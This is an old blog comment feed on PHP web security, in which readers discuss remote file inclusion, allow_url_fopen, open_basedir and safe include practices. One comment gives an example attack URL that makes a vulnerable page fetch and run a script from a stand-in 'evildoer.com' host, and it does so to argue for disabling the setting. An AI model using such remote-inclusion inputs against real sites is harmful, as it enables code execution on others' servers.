Technosailor - Latest Comments in Lessons in Web Security: PHP and Remote File Executionhttp://technosailor.disqus.com/enWed, 07 Sep 2005 18:21:52 -0000Re: Lessons in Web Security: PHP and Remote File Executionhttp://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/#comment-1028691Here's a simple example of why allow_url_fopen is a problem in the real world.<br /><br><br /><br>I've seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:<br /><br><br /><br><br /><br><br /><br>And then they run it with something like "http://www.example.com/index.php?page=page5.html".<br /><br><br /><br>All it takes is someone to come along and type "http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt", and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers... whatever.<br /><br><br /><br>Moral: allow_url_fopen should *always* be off unless you need it.<br /><br><br /><br>RobRobert MathewsWed, 07 Sep 2005 18:21:52 -0000Re: Lessons in Web Security: PHP and Remote File Executionhttp://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/#comment-1028690Hey Matt,<br /><br>Checking $_SERVER[’DOCUMENT_ROOT’] will not work because that global variable will be set according to the page doing the including, not the remote file itself. And yes, FTP will be a topic. :)<br /><br><br /><br>Leave a CommentAaronThu, 03 Feb 2005 09:30:48 -0000Re: Lessons in Web Security: PHP and Remote File Executionhttp://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/#comment-1028689Ah yes open_basedir(), figured you'd mention that. Nice idea to use file_exists to check a file before including it. I s'pose there's lot of stuff you could do, like checking the $_SERVER["DOCUMENT_ROOT"] or the HOSTNAME to check the file is coming from itself.<br /><br><br /><br>Are you gonna do anything on FTP security? Not being much of a security buff myself, but thinking about it, were someone able to gain FTP access (don't know but with register_globals on, could you pass a system command through a $_GET equiv, or guest accounts/public_ftp etc.) then they could upload whatever they wanted and have away with your system.<br /><br><br /><br>And you might want to mention for the more n00b programmers out there to give all includes a .php extension (and not a .inc, for example ;) :p).<br /><br><br /><br>MattMatt ThorntonThu, 03 Feb 2005 08:43:14 -0000